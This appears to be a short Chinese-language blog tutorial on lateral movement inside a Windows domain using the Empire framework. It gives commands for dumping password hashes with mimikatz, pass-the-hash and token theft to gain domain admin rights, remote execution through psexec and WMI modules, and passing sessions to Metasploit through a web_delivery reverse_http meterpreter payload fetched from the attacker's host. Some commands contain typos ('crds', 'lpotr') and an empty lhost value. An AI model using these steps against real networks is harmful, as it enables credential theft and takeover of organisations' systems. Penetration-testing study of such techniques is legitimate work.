橫向移動相關
VSole2022-05-08 06:31:56
#001 獲取密碼hash
1、內置mimikatz:
mimikatz #執行會有點緩慢,執行成功即可抓取hash

2、creds命令:
creds

creds<空格>+<雙擊tab鍵> 可以看到擴展命令

當內網很復雜,hash很多時,可以通過export導出為csv文件
crds export /root/hash #會自動添加文件后綴

結果如下:

#002 橫向移動模塊
1、令牌竊取配合hash傳遞:
①執行mimikatz后
creds #列出所有Empire獲取到的密碼

②當發現列舉出的creds中,有域高權限用戶時,使用hash傳遞方式攻擊:
pth

然后就能看見PID號,竊取該PID進程的令牌即可
steal_token

即可成功獲取域管權限
2、橫向移動常用模塊:
①invoke-psexec:
usemodule lateral_movement/invoke_psexec set ComputerName <目標計算機名> set Listener <監聽器名稱>

成功會返回目標機器的agent會話
②invoke-wmi:
usemodule lateral_movement/invoke_wmi set ComputerName <目標計算機名> set Listener <監聽器名稱>

成功會返回目標機器的agent會話
③其他模塊根據實際情況選用即可
usemodule lateral_movement/ #tab鍵列出模塊

#003 轉為MSF會話
Invoke-MetasploitPayload<-->web_delivery(MSF):
①MSF執行:
use exploit/multi/script/web_delivery set target 2 set payload windows/meterpreter/reverse_http set lhost set lpotr <監聽端口> exploit

②Empire執行:
usemodule code_execution/invoke_metasploitpayload set URL execute

執行成功后,MSF會上線一個新的meterpreter會話

VSole
網絡安全專家